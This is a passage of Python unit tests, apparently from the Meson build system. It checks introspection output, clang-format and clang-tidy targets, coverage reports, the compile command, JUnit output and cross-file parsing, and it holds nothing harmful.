testfile = os.path.join(self.common_test_dir, '34 run program', 'meson.build') res = self.introspect_directory(testfile, '--projectinfo') self.assertEqual(set(res['buildsystem_files']), set(['meson.build'])) self.assertEqual(res['version'], 'undefined') self.assertEqual(res['descriptive_name'], 'run command') self.assertEqual(res['subprojects'], []) testfile = os.path.join(self.common_test_dir, '41 options', 'meson.build') res = self.introspect_directory(testfile, '--projectinfo') self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build'])) self.assertEqual(res['version'], 'undefined') self.assertEqual(res['descriptive_name'], 'options') self.assertEqual(res['subprojects'], []) testfile = os.path.join(self.common_test_dir, '44 subproject options', 'meson.build') res = self.introspect_directory(testfile, '--projectinfo') self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build'])) self.assertEqual(res['version'], 'undefined') self.assertEqual(res['descriptive_name'], 'suboptions') self.assertEqual(len(res['subprojects']), 1) subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files']) self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build'])) self.assertEqual(res['subprojects'][0]['name'], 'subproject') self.assertEqual(res['subprojects'][0]['version'], 'undefined') self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject') def test_introspect_projectinfo_subprojects(self): testdir = os.path.join(self.common_test_dir, '99 subproject subdir') self.init(testdir) res = self.introspect('--projectinfo') expected = { 'descriptive_name': 'proj', 'version': 'undefined', 'subproject_dir': 'subprojects', 'subprojects': [ { 'descriptive_name': 'sub', 'name': 'sub', 'version': '1.0' }, { 'descriptive_name': 'sub_implicit', 'name': 'sub_implicit', 'version': '1.0', }, { 'descriptive_name': 'sub-novar', 'name': 'sub_novar', 'version': '1.0', }, { 'descriptive_name': 'subsub', 'name': 'subsub', 'version': 'undefined' }, { 'descriptive_name': 'subsubsub', 'name': 'subsubsub', 'version': 'undefined' }, ] } res['subprojects'] = sorted(res['subprojects'], key=lambda i: i['name']) self.assertDictEqual(expected, res) def test_introspection_target_subproject(self): testdir = os.path.join(self.common_test_dir, '43 subproject') self.init(testdir) res = self.introspect('--targets') expected = { 'sublib': 'sublib', 'simpletest': 'sublib', 'user': None } for entry in res: name = entry['name'] self.assertEqual(entry['subproject'], expected[name]) def test_introspect_projectinfo_subproject_dir(self): testdir = os.path.join(self.common_test_dir, '76 custom subproject dir') self.init(testdir) res = self.introspect('--projectinfo') self.assertEqual(res['subproject_dir'], 'custom_subproject_dir') def test_introspect_projectinfo_subproject_dir_from_source(self): testfile = os.path.join(self.common_test_dir, '76 custom subproject dir', 'meson.build') res = self.introspect_directory(testfile, '--projectinfo') self.assertEqual(res['subproject_dir'], 'custom_subproject_dir') @skipIfNoExecutable('clang-format') def test_clang_format(self): if self.backend is not Backend.ninja: raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name)) testdir = os.path.join(self.unit_test_dir, '54 clang-format') testfile = os.path.join(testdir, 'prog.c') badfile = os.path.join(testdir, 'prog_orig_c') goodfile = os.path.join(testdir, 'prog_expected_c') testheader = os.path.join(testdir, 'header.h') badheader = os.path.join(testdir, 'header_orig_h') goodheader = os.path.join(testdir, 'header_expected_h') try: shutil.copyfile(badfile, testfile) shutil.copyfile(badheader, testheader) self.init(testdir) self.assertNotEqual(Path(testfile).read_text(), Path(goodfile).read_text()) self.assertNotEqual(Path(testheader).read_text(), Path(goodheader).read_text()) self.run_target('clang-format') self.assertEqual(Path(testheader).read_text(), Path(goodheader).read_text()) finally: if os.path.exists(testfile): os.unlink(testfile) if os.path.exists(testheader): os.unlink(testheader) @skipIfNoExecutable('clang-tidy') def test_clang_tidy(self): if self.backend is not Backend.ninja: raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name)) if shutil.which('c++') is None: raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.') if is_osx(): raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.') testdir = os.path.join(self.unit_test_dir, '70 clang-tidy') dummydir = os.path.join(testdir, 'dummydir.h') self.init(testdir, override_envvars={'CXX': 'c++'}) out = self.run_target('clang-tidy') self.assertIn('cttest.cpp:4:20', out) self.assertNotIn(dummydir, out) def test_identity_cross(self): testdir = os.path.join(self.unit_test_dir, '71 cross') # Do a build to generate a cross file where the host is this target self.init(testdir, extra_args=['-Dgenerate=true']) self.meson_cross_file = os.path.join(self.builddir, "crossfile") self.assertTrue(os.path.exists(self.meson_cross_file)) # Now verify that this is detected as cross self.new_builddir() self.init(testdir) def test_introspect_buildoptions_without_configured_build(self): testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions') testfile = os.path.join(testdir, 'meson.build') res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args) self.init(testdir, default_args=False) res_wb = self.introspect('--buildoptions') self.maxDiff = None # XXX: These now generate in a different order, is that okay? self.assertListEqual(sorted(res_nb, key=lambda x: x['name']), sorted(res_wb, key=lambda x: x['name'])) def test_meson_configure_from_source_does_not_crash(self): testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions') self._run(self.mconf_command + [testdir]) def test_introspect_buildoptions_cross_only(self): testdir = os.path.join(self.unit_test_dir, '84 cross only introspect') testfile = os.path.join(testdir, 'meson.build') res = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args) optnames = [o['name'] for o in res] self.assertIn('c_args', optnames) self.assertNotIn('build.c_args', optnames) def test_introspect_json_dump(self): testdir = os.path.join(self.unit_test_dir, '57 introspection') self.init(testdir) infodir = os.path.join(self.builddir, 'meson-info') self.assertPathExists(infodir) def assertKeyTypes(key_type_list, obj, strict: bool = True): for i in key_type_list: if isinstance(i[1], (list, tuple)) and None in i[1]: i = (i[0], tuple([x for x in i[1] if x is not None])) if i[0] not in obj or obj[i[0]] is None: continue self.assertIn(i[0], obj) self.assertIsInstance(obj[i[0]], i[1]) if strict: for k in obj.keys(): found = False for i in key_type_list: if k == i[0]: found = True break self.assertTrue(found, 'Key "{}" not in expected list'.format(k)) root_keylist = [ ('benchmarks', list), ('buildoptions', list), ('buildsystem_files', list), ('dependencies', list), ('installed', dict), ('projectinfo', dict), ('targets', list), ('tests', list), ] test_keylist = [ ('cmd', list), ('env', dict), ('name', str), ('timeout', int), ('suite', list), ('is_parallel', bool), ('protocol', str), ('depends', list), ('workdir', (str, None)), ('priority', int), ] buildoptions_keylist = [ ('name', str), ('section', str), ('type', str), ('description', str), ('machine', str), ('choices', (list, None)), ('value', (str, int, bool, list)), ] buildoptions_typelist = [ ('combo', str, [('choices', list)]), ('string', str, []), ('boolean', bool, []), ('integer', int, []), ('array', list, []), ] buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test'] buildoptions_machines = ['any', 'build', 'host'] dependencies_typelist = [ ('name', str), ('version', str), ('compile_args', list), ('link_args', list), ] targets_typelist = [ ('name', str), ('id', str), ('type', str), ('defined_in', str), ('filename', list), ('build_by_default', bool), ('target_sources', list), ('extra_files', list), ('subproject', (str, None)), ('install_filename', (list, None)), ('installed', bool), ] targets_sources_typelist = [ ('language', str), ('compiler', list), ('parameters', list), ('sources', list), ('generated_sources', list), ] # First load all files res = {} for i in root_keylist: curr = os.path.join(infodir, 'intro-{}.json'.format(i[0])) self.assertPathExists(curr) with open(curr, 'r') as fp: res[i[0]] = json.load(fp) assertKeyTypes(root_keylist, res) # Match target ids to input and output files for ease of reference src_to_id = {} out_to_id = {} for i in res['targets']: print(json.dump(i, sys.stdout)) out_to_id.update({os.path.relpath(out, self.builddir): i['id'] for out in i['filename']}) for group in i['target_sources']: src_to_id.update({os.path.relpath(src, testdir): i['id'] for src in group['sources']}) # Check Tests and benchmarks tests_to_find = ['test case 1', 'test case 2', 'benchmark 1'] deps_to_find = {'test case 1': [src_to_id['t1.cpp']], 'test case 2': [src_to_id['t2.cpp'], src_to_id['t3.cpp']], 'benchmark 1': [out_to_id['file2'], src_to_id['t3.cpp']]} for i in res['benchmarks'] + res['tests']: assertKeyTypes(test_keylist, i) if i['name'] in tests_to_find: tests_to_find.remove(i['name']) self.assertEqual(sorted(i['depends']), sorted(deps_to_find[i['name']])) self.assertListEqual(tests_to_find, []) # Check buildoptions buildopts_to_find = {'cpp_std': 'c++11'} for i in res['buildoptions']: assertKeyTypes(buildoptions_keylist, i) valid_type = False for j in buildoptions_typelist: if i['type'] == j[0]: self.assertIsInstance(i['value'], j[1]) assertKeyTypes(j[2], i, strict=False) valid_type = True break self.assertIn(i['section'], buildoptions_sections) self.assertIn(i['machine'], buildoptions_machines) self.assertTrue(valid_type) if i['name'] in buildopts_to_find: self.assertEqual(i['value'], buildopts_to_find[i['name']]) buildopts_to_find.pop(i['name'], None) self.assertDictEqual(buildopts_to_find, {}) # Check buildsystem_files bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build'] bs_files = [os.path.join(testdir, x) for x in bs_files] self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files))) # Check dependencies dependencies_to_find = ['threads'] for i in res['dependencies']: assertKeyTypes(dependencies_typelist, i) if i['name'] in dependencies_to_find: dependencies_to_find.remove(i['name']) self.assertListEqual(dependencies_to_find, []) # Check projectinfo self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []}) # Check targets targets_to_find = { 'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'), 'staticTestLib': ('static library', True, False, 'staticlib/meson.build'), 'test1': ('executable', True, True, 'meson.build'), 'test2': ('executable', True, False, 'meson.build'), 'test3': ('executable', True, False, 'meson.build'), } for i in res['targets']: assertKeyTypes(targets_typelist, i) if i['name'] in targets_to_find: tgt = targets_to_find[i['name']] self.assertEqual(i['type'], tgt[0]) self.assertEqual(i['build_by_default'], tgt[1]) self.assertEqual(i['installed'], tgt[2]) self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3])) targets_to_find.pop(i['name'], None) for j in i['target_sources']: assertKeyTypes(targets_sources_typelist, j) self.assertDictEqual(targets_to_find, {}) def test_introspect_file_dump_equals_all(self): testdir = os.path.join(self.unit_test_dir, '57 introspection') self.init(testdir) res_all = self.introspect('--all') res_file = {} root_keylist = [ 'benchmarks', 'buildoptions', 'buildsystem_files', 'dependencies', 'installed', 'projectinfo', 'targets', 'tests', ] infodir = os.path.join(self.builddir, 'meson-info') self.assertPathExists(infodir) for i in root_keylist: curr = os.path.join(infodir, 'intro-{}.json'.format(i)) self.assertPathExists(curr) with open(curr, 'r') as fp: res_file[i] = json.load(fp) self.assertEqual(res_all, res_file) def test_introspect_meson_info(self): testdir = os.path.join(self.unit_test_dir, '57 introspection') introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json') self.init(testdir) self.assertPathExists(introfile) with open(introfile, 'r') as fp: res1 = json.load(fp) for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']: self.assertIn(i, res1) self.assertEqual(res1['error'], False) self.assertEqual(res1['build_files_updated'], True) def test_introspect_config_update(self): testdir = os.path.join(self.unit_test_dir, '57 introspection') introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json') self.init(testdir) self.assertPathExists(introfile) with open(introfile, 'r') as fp: res1 = json.load(fp) for i in res1: if i['name'] == 'cpp_std': i['value'] = 'c++14' if i['name'] == 'build.cpp_std': i['value'] = 'c++14' if i['name'] == 'buildtype': i['value'] = 'release' if i['name'] == 'optimization': i['value'] = '3' if i['name'] == 'debug': i['value'] = False self.setconf('-Dcpp_std=c++14') self.setconf('-Dbuildtype=release') with open(introfile, 'r') as fp: res2 = json.load(fp) self.assertListEqual(res1, res2) def test_introspect_targets_from_source(self): testdir = os.path.join(self.unit_test_dir, '57 introspection') testfile = os.path.join(testdir, 'meson.build') introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json') self.init(testdir) self.assertPathExists(introfile) with open(introfile, 'r') as fp: res_wb = json.load(fp) res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args) # Account for differences in output res_wb = [i for i in res_wb if i['type'] != 'custom'] for i in res_wb: i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']] if 'install_filename' in i: del i['install_filename'] sources = [] for j in i['target_sources']: sources += j['sources'] i['target_sources'] = [{ 'language': 'unknown', 'compiler': [], 'parameters': [], 'sources': sources, 'generated_sources': [] }] self.maxDiff = None self.assertListEqual(res_nb, res_wb) def test_introspect_ast_source(self): testdir = os.path.join(self.unit_test_dir, '57 introspection') testfile = os.path.join(testdir, 'meson.build') res_nb = self.introspect_directory(testfile, ['--ast'] + self.meson_args) node_counter = {} def accept_node(json_node): self.assertIsInstance(json_node, dict) for i in ['lineno', 'colno', 'end_lineno', 'end_colno']: self.assertIn(i, json_node) self.assertIsInstance(json_node[i], int) self.assertIn('node', json_node) n = json_node['node'] self.assertIsInstance(n, str) self.assertIn(n, nodes) if n not in node_counter: node_counter[n] = 0 node_counter[n] = node_counter[n] + 1 for nodeDesc in nodes[n]: key = nodeDesc[0] func = nodeDesc[1] self.assertIn(key, json_node) if func is None: tp = nodeDesc[2] self.assertIsInstance(json_node[key], tp) continue func(json_node[key]) def accept_node_list(node_list): self.assertIsInstance(node_list, list) for i in node_list: accept_node(i) def accept_kwargs(kwargs): self.assertIsInstance(kwargs, list) for i in kwargs: self.assertIn('key', i) self.assertIn('val', i) accept_node(i['key']) accept_node(i['val']) nodes = { 'BooleanNode': [('value', None, bool)], 'IdNode': [('value', None, str)], 'NumberNode': [('value', None, int)], 'StringNode': [('value', None, str)], 'ContinueNode': [], 'BreakNode': [], 'ArgumentNode': [('positional', accept_node_list), ('kwargs', accept_kwargs)], 'ArrayNode': [('args', accept_node)], 'DictNode': [('args', accept_node)], 'EmptyNode': [], 'OrNode': [('left', accept_node), ('right', accept_node)], 'AndNode': [('left', accept_node), ('right', accept_node)], 'ComparisonNode': [('left', accept_node), ('right', accept_node), ('ctype', None, str)], 'ArithmeticNode': [('left', accept_node), ('right', accept_node), ('op', None, str)], 'NotNode': [('right', accept_node)], 'CodeBlockNode': [('lines', accept_node_list)], 'IndexNode': [('object', accept_node), ('index', accept_node)], 'MethodNode': [('object', accept_node), ('args', accept_node), ('name', None, str)], 'FunctionNode': [('args', accept_node), ('name', None, str)], 'AssignmentNode': [('value', accept_node), ('var_name', None, str)], 'PlusAssignmentNode': [('value', accept_node), ('var_name', None, str)], 'ForeachClauseNode': [('items', accept_node), ('block', accept_node), ('varnames', None, list)], 'IfClauseNode': [('ifs', accept_node_list), ('else', accept_node)], 'IfNode': [('condition', accept_node), ('block', accept_node)], 'UMinusNode': [('right', accept_node)], 'TernaryNode': [('condition', accept_node), ('true', accept_node), ('false', accept_node)], } accept_node(res_nb) for n, c in [('ContinueNode', 2), ('BreakNode', 1), ('NotNode', 3)]: self.assertIn(n, node_counter) self.assertEqual(node_counter[n], c) def test_introspect_dependencies_from_source(self): testdir = os.path.join(self.unit_test_dir, '57 introspection') testfile = os.path.join(testdir, 'meson.build') res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args) expected = [ { 'name': 'threads', 'required': True, 'version': [], 'has_fallback': False, 'conditional': False }, { 'name': 'zlib', 'required': False, 'version': [], 'has_fallback': False, 'conditional': False }, { 'name': 'bugDep1', 'required': True, 'version': [], 'has_fallback': False, 'conditional': False }, { 'name': 'somethingthatdoesnotexist', 'required': True, 'version': ['>=1.2.3'], 'has_fallback': False, 'conditional': True }, { 'name': 'look_i_have_a_fallback', 'required': True, 'version': ['>=1.0.0', '<=99.9.9'], 'has_fallback': True, 'conditional': True } ] self.maxDiff = None self.assertListEqual(res_nb, expected) def test_unstable_coredata(self): testdir = os.path.join(self.common_test_dir, '1 trivial') self.init(testdir) # just test that the command does not fail (e.g. because it throws an exception) self._run([*self.meson_command, 'unstable-coredata', self.builddir]) @skip_if_no_cmake def test_cmake_prefix_path(self): testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path') self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')]) @skip_if_no_cmake def test_cmake_parser(self): testdir = os.path.join(self.unit_test_dir, '65 cmake parser') self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')]) def test_alias_target(self): if self.backend is Backend.vs: # FIXME: This unit test is broken with vs backend, needs investigation raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name)) testdir = os.path.join(self.unit_test_dir, '66 alias target') self.init(testdir) self.build() self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix)) self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt')) self.run_target('build-all') self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix)) self.assertPathExists(os.path.join(self.builddir, 'hello.txt')) def test_configure(self): testdir = os.path.join(self.common_test_dir, '2 cpp') self.init(testdir) self._run(self.mconf_command + [self.builddir]) def test_summary(self): testdir = os.path.join(self.unit_test_dir, '73 summary') out = self.init(testdir) expected = textwrap.dedent(r''' Some Subproject 2.0 string: bar integer: 1 boolean: True My Project 1.0 Configuration Some boolean: False Another boolean: True Some string: Hello World A list: string 1 True empty list: A number: 1 yes: YES no: NO coma list: a, b, c Plugins long coma list: alpha, alphacolor, apetag, audiofx, audioparsers, auparse, autodetect, avi Subprojects sub: YES sub2: NO Problem encountered: This subproject failed ''') expected_lines = expected.split('\n')[1:] out_start = out.find(expected_lines[0]) out_lines = out[out_start:].split('\n')[:len(expected_lines)] if sys.version_info < (3, 7, 0): # Dictionary order is not stable in Python <3.7, so sort the lines # while comparing self.assertEqual(sorted(expected_lines), sorted(out_lines)) else: self.assertEqual(expected_lines, out_lines) def test_meson_compile(self): """Test the meson compile command.""" def get_exe_name(basename: str) -> str: if is_windows(): return '{}.exe'.format(basename) else: return basename def get_shared_lib_name(basename: str) -> str: if mesonbuild.environment.detect_msys2_arch(): return 'lib{}.dll'.format(basename) elif is_windows(): return '{}.dll'.format(basename) elif is_cygwin(): return 'cyg{}.dll'.format(basename) elif is_osx(): return 'lib{}.dylib'.format(basename) else: return 'lib{}.so'.format(basename) def get_static_lib_name(basename: str) -> str: return 'lib{}.a'.format(basename) # Base case (no targets or additional arguments) testdir = os.path.join(self.common_test_dir, '1 trivial') self.init(testdir) self._run([*self.meson_command, 'compile', '-C', self.builddir]) self.assertPathExists(os.path.join(self.builddir, get_exe_name('trivialprog'))) # `--clean` self._run([*self.meson_command, 'compile', '-C', self.builddir, '--clean']) self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog'))) # Target specified in a project with unique names testdir = os.path.join(self.common_test_dir, '6 linkshared') self.init(testdir, extra_args=['--wipe']) # Multiple targets and target type specified self._run([*self.meson_command, 'compile', '-C', self.builddir, 'mylib', 'mycpplib:shared_library']) # Check that we have a shared lib, but not an executable, i.e. check that target actually worked self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mylib'))) self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('prog'))) self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mycpplib'))) self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('cppprog'))) # Target specified in a project with non unique names testdir = os.path.join(self.common_test_dir, '186 same target name') self.init(testdir, extra_args=['--wipe']) self._run([*self.meson_command, 'compile', '-C', self.builddir, './foo']) self.assertPathExists(os.path.join(self.builddir, get_static_lib_name('foo'))) self._run([*self.meson_command, 'compile', '-C', self.builddir, 'sub/foo']) self.assertPathExists(os.path.join(self.builddir, 'sub', get_static_lib_name('foo'))) # run_target testdir = os.path.join(self.common_test_dir, '52 run target') self.init(testdir, extra_args=['--wipe']) out = self._run([*self.meson_command, 'compile', '-C', self.builddir, 'py3hi']) self.assertIn('I am Python3.', out) # `--$BACKEND-args` testdir = os.path.join(self.common_test_dir, '1 trivial') if self.backend is Backend.ninja: self.init(testdir, extra_args=['--wipe']) # Dry run - should not create a program self._run([*self.meson_command, 'compile', '-C', self.builddir, '--ninja-args=-n']) self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog'))) elif self.backend is Backend.vs: self.init(testdir, extra_args=['--wipe']) self._run([*self.meson_command, 'compile', '-C', self.builddir]) # Explicitly clean the target through msbuild interface self._run([*self.meson_command, 'compile', '-C', self.builddir, '--vs-args=-t:{}:Clean'.format(re.sub(r'[\%\$\@\;\.\(\)\']', '_', get_exe_name('trivialprog')))]) self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog'))) def test_spurious_reconfigure_built_dep_file(self): testdir = os.path.join(self.unit_test_dir, '75 dep files') # Regression test: Spurious reconfigure was happening when build # directory is inside source directory. # See https://gitlab.freedesktop.org/gstreamer/gst-build/-/issues/85. srcdir = os.path.join(self.builddir, 'srctree') shutil.copytree(testdir, srcdir) builddir = os.path.join(srcdir, '_build') self.change_builddir(builddir) self.init(srcdir) self.build() # During first configure the file did not exist so no dependency should # have been set. A rebuild should not trigger a reconfigure. self.clean() out = self.build() self.assertNotIn('Project configured', out) self.init(srcdir, extra_args=['--reconfigure']) # During the reconfigure the file did exist, but is inside build # directory, so no dependency should have been set. A rebuild should not # trigger a reconfigure. self.clean() out = self.build() self.assertNotIn('Project configured', out) def _test_junit(self, case: str) -> None: try: import lxml.etree as et except ImportError: raise unittest.SkipTest('lxml required, but not found.') schema = et.XMLSchema(et.parse(str(Path(__file__).parent / 'data' / 'schema.xsd'))) self.init(case) self.run_tests() junit = et.parse(str(Path(self.builddir) / 'meson-logs' / 'testlog.junit.xml')) try: schema.assertValid(junit) except et.DocumentInvalid as e: self.fail(e.error_log) def test_junit_valid_tap(self): self._test_junit(os.path.join(self.common_test_dir, '207 tap tests')) def test_junit_valid_exitcode(self): self._test_junit(os.path.join(self.common_test_dir, '42 test args')) def test_junit_valid_gtest(self): self._test_junit(os.path.join(self.framework_test_dir, '2 gtest')) def test_link_language_linker(self): # TODO: there should be some way to query how we're linking things # without resorting to reading the ninja.build file if self.backend is not Backend.ninja: raise unittest.SkipTest('This test reads the ninja file') testdir = os.path.join(self.common_test_dir, '226 link language') self.init(testdir) build_ninja = os.path.join(self.builddir, 'build.ninja') with open(build_ninja, 'r', encoding='utf-8') as f: contents = f.read() self.assertRegex(contents, r'build main(\.exe)?.*: c_LINKER') self.assertRegex(contents, r'build (lib|cyg)?mylib.*: c_LINKER') def test_commands_documented(self): ''' Test that all listed meson commands are documented in Commands.md. ''' # The docs directory is not in release tarballs. if not os.path.isdir('docs'): raise unittest.SkipTest('Doc directory does not exist.') doc_path = 'docs/markdown/Commands.md' md = None with open(doc_path, encoding='utf-8') as f: md = f.read() self.assertIsNotNone(md) ## Get command sections section_pattern = re.compile(r'^### (.+)$', re.MULTILINE) md_command_section_matches = [i for i in section_pattern.finditer(md)] md_command_sections = dict() for i, s in enumerate(md_command_section_matches): section_end = len(md) if i == len(md_command_section_matches) - 1 else md_command_section_matches[i + 1].start() md_command_sections[s.group(1)] = (s.start(), section_end) ## Validate commands md_commands = set(k for k,v in md_command_sections.items()) help_output = self._run(self.meson_command + ['--help']) help_commands = set(c.strip() for c in re.findall(r'usage:(?:.+)?{((?:[a-z]+,*)+?)}', help_output, re.MULTILINE|re.DOTALL)[0].split(',')) self.assertEqual(md_commands | {'help'}, help_commands, 'Doc file: `{}`'.format(doc_path)) ## Validate that each section has proper placeholders def get_data_pattern(command): return re.compile( r'{{ ' + command + r'_usage.inc }}[\r\n]' r'.*?' r'{{ ' + command + r'_arguments.inc }}[\r\n]', flags = re.MULTILINE|re.DOTALL) for command in md_commands: m = get_data_pattern(command).search(md, pos=md_command_sections[command][0], endpos=md_command_sections[command][1]) self.assertIsNotNone(m, 'Command `{}` is missing placeholders for dynamic data. Doc file: `{}`'.format(command, doc_path)) def _check_coverage_files(self, types=('text', 'xml', 'html')): covdir = Path(self.builddir) / 'meson-logs' files = [] if 'text' in types: files.append('coverage.txt') if 'xml' in types: files.append('coverage.xml') if 'html' in types: files.append('coveragereport/index.html') for f in files: self.assertTrue((covdir / f).is_file(), msg='{} is not a file'.format(f)) def test_coverage(self): if mesonbuild.environment.detect_msys2_arch(): raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2') gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr() if not gcovr_exe: raise unittest.SkipTest('gcovr not found, or too old') testdir = os.path.join(self.common_test_dir, '1 trivial') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_id() == 'clang': if not mesonbuild.environment.detect_llvm_cov(): raise unittest.SkipTest('llvm-cov not found') if cc.get_id() == 'msvc': raise unittest.SkipTest('Test only applies to non-MSVC compilers') self.init(testdir, extra_args=['-Db_coverage=true']) self.build() self.run_tests() self.run_target('coverage') self._check_coverage_files() def test_coverage_complex(self): if mesonbuild.environment.detect_msys2_arch(): raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2') gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr() if not gcovr_exe: raise unittest.SkipTest('gcovr not found, or too old') testdir = os.path.join(self.common_test_dir, '106 generatorcustom') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_id() == 'clang': if not mesonbuild.environment.detect_llvm_cov(): raise unittest.SkipTest('llvm-cov not found') if cc.get_id() == 'msvc': raise unittest.SkipTest('Test only applies to non-MSVC compilers') self.init(testdir, extra_args=['-Db_coverage=true']) self.build() self.run_tests() self.run_target('coverage') self._check_coverage_files() def test_coverage_html(self): if mesonbuild.environment.detect_msys2_arch(): raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2') gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr() if not gcovr_exe: raise unittest.SkipTest('gcovr not found, or too old') testdir = os.path.join(self.common_test_dir, '1 trivial') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_id() == 'clang': if not mesonbuild.environment.detect_llvm_cov(): raise unittest.SkipTest('llvm-cov not found') if cc.get_id() == 'msvc': raise unittest.SkipTest('Test only applies to non-MSVC compilers') self.init(testdir, extra_args=['-Db_coverage=true']) self.build() self.run_tests() self.run_target('coverage-html') self._check_coverage_files(['html']) def test_coverage_text(self): if mesonbuild.environment.detect_msys2_arch(): raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2') gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr() if not gcovr_exe: raise unittest.SkipTest('gcovr not found, or too old') testdir = os.path.join(self.common_test_dir, '1 trivial') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_id() == 'clang': if not mesonbuild.environment.detect_llvm_cov(): raise unittest.SkipTest('llvm-cov not found') if cc.get_id() == 'msvc': raise unittest.SkipTest('Test only applies to non-MSVC compilers') self.init(testdir, extra_args=['-Db_coverage=true']) self.build() self.run_tests() self.run_target('coverage-text') self._check_coverage_files(['text']) def test_coverage_xml(self): if mesonbuild.environment.detect_msys2_arch(): raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2') gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr() if not gcovr_exe: raise unittest.SkipTest('gcovr not found, or too old') testdir = os.path.join(self.common_test_dir, '1 trivial') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_id() == 'clang': if not mesonbuild.environment.detect_llvm_cov(): raise unittest.SkipTest('llvm-cov not found') if cc.get_id() == 'msvc': raise unittest.SkipTest('Test only applies to non-MSVC compilers') self.init(testdir, extra_args=['-Db_coverage=true']) self.build() self.run_tests() self.run_target('coverage-xml') self._check_coverage_files(['xml']) def test_cross_file_constants(self): with temp_filename() as crossfile1, temp_filename() as crossfile2: with open(crossfile1, 'w') as f: f.write(textwrap.dedent( ''' [constants] compiler = 'gcc' ''')) with open(crossfile2, 'w') as f: f.write(textwrap.dedent( ''' [constants] toolchain = '/toolchain/' common_flags = ['--sysroot=' + toolchain / 'sysroot'] [properties] c_args = common_flags + ['-DSOMETHING'] cpp_args = c_args + ['-DSOMETHING_ELSE'] [binaries] c = toolchain / compiler ''')) values = mesonbuild.coredata.parse_machine_files([crossfile1, crossfile2]) self.assertEqual(values['binaries']['c'], '/toolchain/gcc') self.assertEqual(values['properties']['c_args'], ['--sysroot=/toolchain/sysroot', '-DSOMETHING']) self.assertEqual(values['properties']['cpp_args'], ['--sysroot=/toolchain/sysroot', '-DSOMETHING', '-DSOMETHING_ELSE']) @unittest.skipIf(is_windows(), 'Directory cleanup fails for some reason') def test_wrap_git(self): with tempfile.TemporaryDirectory() as tmpdir: srcdir = os.path.join(tmpdir, 'src') shutil.copytree(os.path.join(self.unit_test_dir, '82 wrap-git'), srcdir) upstream = os.path.join(srcdir, 'subprojects', 'wrap_git_upstream') upstream_uri = Path(upstream).as_uri() _git_init(upstream) with open(os.path.join(srcdir, 'subprojects', 'wrap_git.wrap'), 'w') as f: f.write(textwrap.dedent(''' [wrap-git] url = {} patch_directory = wrap_git_builddef revision = master '''.format(upstream_uri))) self.init(srcdir) self.build() self.run_tests() def test_multi_output_custom_target_no_warning(self): testdir = os.path.join(self.common_test_dir, '229 custom_target source') out = self.init(testdir) self.assertNotRegex(out, 'WARNING:.*Using the first one.') self.build() self.run_tests() @unittest.skipUnless(is_linux() and (re.search('^i.86$|^x86$|^x64$|^x86_64$|^amd64$', platform.processor()) is not None), 'Requires ASM compiler for x86 or x86_64 platform currently only available on Linux CI runners') def test_nostdlib(self): testdir = 